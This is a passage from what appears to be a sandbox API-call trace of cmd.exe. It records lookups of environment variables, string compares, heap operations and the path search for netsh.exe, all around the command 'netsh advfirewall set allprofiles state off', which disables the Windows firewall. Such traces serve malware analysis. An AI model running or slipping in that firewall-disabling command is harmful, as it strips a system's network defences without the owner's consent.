lpType=0x1ee5e0*=0x0, lpData=0x1ee600*=0x9, lpcbData=0x1ee5e4*=0x1000) returned 0x2 [0114.160] RegCloseKey (hKey=0x44) returned 0x0 [0114.160] time (in: timer=0x0 | out: timer=0x0) returned 0x5e691d8d [0114.160] srand (_Seed=0x5e691d8d) [0114.160] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" [0114.160] GetCommandLineW () returned="\"C:\\Windows\\sysnative\\cmd.exe\" /c netsh advfirewall set allprofiles state off" [0114.161] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.161] GetProcessHeap () returned 0x270000 [0114.161] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x28aaf0 [0114.161] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28ab00, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0114.161] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.161] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.162] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0114.162] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0114.162] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0114.162] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0114.162] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0114.162] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0114.162] GetProcessHeap () returned 0x270000 [0114.162] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x2895d0 | out: hHeap=0x270000) returned 1 [0114.162] GetEnvironmentStringsW () returned 0x288b40* [0114.163] GetProcessHeap () returned 0x270000 [0114.163] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xa94) returned 0x28ad10 [0114.163] FreeEnvironmentStringsW (penv=0x288b40) returned 1 [0114.163] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0114.163] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0114.163] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0114.163] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0114.163] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0114.163] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0114.164] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0114.164] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0114.164] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0114.164] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0114.164] GetProcessHeap () returned 0x270000 [0114.164] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5c) returned 0x28b7b0 [0114.164] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1ef3f0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.165] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x1ef3f0, lpFilePart=0x1ef3d0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1ef3d0*="Desktop") returned 0x25 [0114.165] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.165] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x28b820 [0114.165] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.165] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x28b820 [0114.165] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.166] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0114.166] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x1ef100 | out: lpFindFileData=0x1ef100*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x218e9fe0, ftLastAccessTime.dwHighDateTime=0x1d5f7c9, ftLastWriteTime.dwLowDateTime=0x218e9fe0, ftLastWriteTime.dwHighDateTime=0x1d5f7c9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x28b820 [0114.166] FindClose (in: hFindFile=0x28b820 | out: hFindFile=0x28b820) returned 1 [0114.166] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0114.166] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0114.166] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0114.168] GetProcessHeap () returned 0x270000 [0114.168] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ad10 | out: hHeap=0x270000) returned 1 [0114.168] GetEnvironmentStringsW () returned 0x28b820* [0114.169] GetProcessHeap () returned 0x270000 [0114.169] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xae8) returned 0x28c310 [0114.169] FreeEnvironmentStringsW (penv=0x28b820) returned 1 [0114.169] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4ac2c0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0114.169] GetProcessHeap () returned 0x270000 [0114.169] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28b7b0 | out: hHeap=0x270000) returned 1 [0114.169] GetProcessHeap () returned 0x270000 [0114.169] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4016) returned 0x28ce00 [0114.170] GetProcessHeap () returned 0x270000 [0114.170] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6c) returned 0x289630 [0114.170] GetProcessHeap () returned 0x270000 [0114.170] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce00 | out: hHeap=0x270000) returned 1 [0114.171] GetConsoleOutputCP () returned 0x1b5 [0114.296] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4ac2bfe0 | out: lpCPInfo=0x4ac2bfe0) returned 1 [0114.296] GetUserDefaultLCID () returned 0x409 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4ac27b50, cchData=8 | out: lpLCData=":") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1ef500, cchData=128 | out: lpLCData="0") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1ef500, cchData=128 | out: lpLCData="1") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4ac3a740, cchData=8 | out: lpLCData="/") returned 2 [0114.298] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4ac3a4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4ac3a460, cchData=32 | out: lpLCData="Tue") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4ac3a420, cchData=32 | out: lpLCData="Wed") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4ac3a3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4ac3a3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4ac3a360, cchData=32 | out: lpLCData="Sat") returned 4 [0114.299] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4ac3a700, cchData=32 | out: lpLCData="Sun") returned 4 [0114.300] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4ac27b40, cchData=8 | out: lpLCData=".") returned 2 [0114.300] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4ac3a4e0, cchData=8 | out: lpLCData=",") returned 2 [0114.300] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0114.300] GetProcessHeap () returned 0x270000 [0114.301] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x20c) returned 0x289720 [0114.301] GetConsoleTitleW (in: lpConsoleTitle=0x289720, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.301] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77940000 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="CopyFileExW") returned 0x779523d0 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="IsDebuggerPresent") returned 0x77948290 [0114.301] GetProcAddress (hModule=0x77940000, lpProcName="SetConsoleInputExeNameW") returned 0x779517e0 [0114.302] GetProcessHeap () returned 0x270000 [0114.302] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x4012) returned 0x28ce00 [0114.302] GetProcessHeap () returned 0x270000 [0114.302] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x28ce00 | out: hHeap=0x270000) returned 1 [0114.302] _wcsicmp (_String1="netsh", _String2=")") returned 69 [0114.302] _wcsicmp (_String1="FOR", _String2="netsh") returned -8 [0114.302] _wcsicmp (_String1="FOR/?", _String2="netsh") returned -8 [0114.302] _wcsicmp (_String1="IF", _String2="netsh") returned -5 [0114.303] _wcsicmp (_String1="IF/?", _String2="netsh") returned -5 [0114.303] _wcsicmp (_String1="REM", _String2="netsh") returned 4 [0114.303] _wcsicmp (_String1="REM/?", _String2="netsh") returned 4 [0114.303] GetProcessHeap () returned 0x270000 [0114.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xb0) returned 0x289940 [0114.303] GetProcessHeap () returned 0x270000 [0114.303] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x1c) returned 0x284670 [0114.304] GetProcessHeap () returned 0x270000 [0114.304] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x5e) returned 0x289a00 [0114.306] GetConsoleTitleW (in: lpConsoleTitle=0x1ef410, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.306] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0114.306] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0114.306] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0114.306] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0114.306] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0114.307] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0114.307] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0114.307] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0114.307] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0114.307] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0114.307] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0114.307] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0114.307] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0114.307] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0114.307] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0114.307] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0114.307] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0114.307] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0114.307] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0114.308] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0114.308] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0114.308] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0114.308] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0114.308] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0114.308] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0114.308] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0114.308] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0114.308] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0114.308] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0114.308] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0114.308] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0114.308] _wcsicmp (_String1="netsh", _String2="DIR") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="ERASE") returned 9 [0114.308] _wcsicmp (_String1="netsh", _String2="DEL") returned 10 [0114.308] _wcsicmp (_String1="netsh", _String2="TYPE") returned -6 [0114.308] _wcsicmp (_String1="netsh", _String2="COPY") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="CD") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="CHDIR") returned 11 [0114.308] _wcsicmp (_String1="netsh", _String2="RENAME") returned -4 [0114.308] _wcsicmp (_String1="netsh", _String2="REN") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="ECHO") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="SET") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="PAUSE") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="DATE") returned 10 [0114.309] _wcsicmp (_String1="netsh", _String2="TIME") returned -6 [0114.309] _wcsicmp (_String1="netsh", _String2="PROMPT") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="MD") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="MKDIR") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="RD") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="RMDIR") returned -4 [0114.309] _wcsicmp (_String1="netsh", _String2="PATH") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="GOTO") returned 7 [0114.309] _wcsicmp (_String1="netsh", _String2="SHIFT") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="CLS") returned 11 [0114.309] _wcsicmp (_String1="netsh", _String2="CALL") returned 11 [0114.309] _wcsicmp (_String1="netsh", _String2="VERIFY") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="VER") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="VOL") returned -8 [0114.309] _wcsicmp (_String1="netsh", _String2="EXIT") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="SETLOCAL") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="ENDLOCAL") returned 9 [0114.309] _wcsicmp (_String1="netsh", _String2="TITLE") returned -6 [0114.309] _wcsicmp (_String1="netsh", _String2="START") returned -5 [0114.309] _wcsicmp (_String1="netsh", _String2="DPATH") returned 10 [0114.309] _wcsicmp (_String1="netsh", _String2="KEYS") returned 3 [0114.309] _wcsicmp (_String1="netsh", _String2="MOVE") returned 1 [0114.309] _wcsicmp (_String1="netsh", _String2="PUSHD") returned -2 [0114.309] _wcsicmp (_String1="netsh", _String2="POPD") returned -2 [0114.310] _wcsicmp (_String1="netsh", _String2="ASSOC") returned 13 [0114.310] _wcsicmp (_String1="netsh", _String2="FTYPE") returned 8 [0114.310] _wcsicmp (_String1="netsh", _String2="BREAK") returned 12 [0114.310] _wcsicmp (_String1="netsh", _String2="COLOR") returned 11 [0114.310] _wcsicmp (_String1="netsh", _String2="MKLINK") returned 1 [0114.310] _wcsicmp (_String1="netsh", _String2="FOR") returned 8 [0114.310] _wcsicmp (_String1="netsh", _String2="IF") returned 5 [0114.310] _wcsicmp (_String1="netsh", _String2="REM") returned -4 [0114.310] GetProcessHeap () returned 0x270000 [0114.310] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x218) returned 0x289a70 [0114.310] GetProcessHeap () returned 0x270000 [0114.310] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x6a) returned 0x289c90 [0114.311] _wcsnicmp (_String1="nets", _String2="cmd ", _MaxCount=0x4) returned 11 [0114.311] GetProcessHeap () returned 0x270000 [0114.311] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x420) returned 0x271320 [0114.311] SetErrorMode (uMode=0x0) returned 0x0 [0114.312] SetErrorMode (uMode=0x1) returned 0x0 [0114.312] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x271330, lpFilePart=0x1eeca0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x1eeca0*="Desktop") returned 0x25 [0114.312] SetErrorMode (uMode=0x0) returned 0x1 [0114.312] GetProcessHeap () returned 0x270000 [0114.312] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x271320, Size=0x68) returned 0x271320 [0114.312] GetProcessHeap () returned 0x270000 [0114.312] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x271320) returned 0x68 [0114.312] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0114.313] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0114.313] GetProcessHeap () returned 0x270000 [0114.313] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x128) returned 0x289d10 [0114.313] GetProcessHeap () returned 0x270000 [0114.313] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x240) returned 0x2713a0 [0114.322] GetProcessHeap () returned 0x270000 [0114.322] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2713a0, Size=0x12a) returned 0x2713a0 [0114.322] GetProcessHeap () returned 0x270000 [0114.322] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x2713a0) returned 0x12a [0114.322] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4ac1f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0114.322] GetProcessHeap () returned 0x270000 [0114.323] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0xe8) returned 0x289e40 [0114.323] GetProcessHeap () returned 0x270000 [0114.323] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x289e40, Size=0x7e) returned 0x289e40 [0114.323] GetProcessHeap () returned 0x270000 [0114.323] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x289e40) returned 0x7e [0114.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.328] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0114.328] GetLastError () returned 0x2 [0114.328] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\netsh", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0114.328] GetLastError () returned 0x2 [0114.328] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.*", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0x289ed0 [0114.329] GetProcessHeap () returned 0x270000 [0114.329] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x0, Size=0x28) returned 0x2846a0 [0114.329] FindClose (in: hFindFile=0x289ed0 | out: hFindFile=0x289ed0) returned 1 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.COM", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0xffffffffffffffff [0114.329] GetLastError () returned 0x2 [0114.329] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\netsh.EXE", fInfoLevelId=0x1, lpFindFileData=0x1eea10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1eea10) returned 0x289ed0 [0114.329] GetProcessHeap () returned 0x270000 [0114.329] RtlReAllocateHeap (Heap=0x270000, Flags=0x0, Ptr=0x2846a0, Size=0x8) returned 0x2889e0 [0114.329] FindClose (in: hFindFile=0x289ed0 | out: hFindFile=0x289ed0) returned 1 [0114.329] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0114.329] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0114.330] GetConsoleTitleW (in: lpConsoleTitle=0x1eef60, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\sysnative\\cmd.exe") returned 0x1c [0114.330] InitializeProcThreadAttributeList (in: lpAttributeList=0x1eed18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1eecd8 | out: lpAttributeList=0x1eed18, lpSize=0x1eecd8) returned 1 [0114.330] UpdateProcThreadAttribute (in: lpAttributeList=0x1eed18, dwFlags=0x0, Attribute=0x60001, lpValue=0x1eecc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1eed18, lpPreviousValue=0x0) returned 1 [0114.330] GetStartupInfoW (in: lpStartupInfo=0x1eee30 | out: lpStartupInfo=0x1eee30*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\sysnative\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0114.330] GetProcessHeap () returned 0x270000 [0114.330] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x20) returned 0x2846a0 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0114.330] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0114.331] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0114.332] 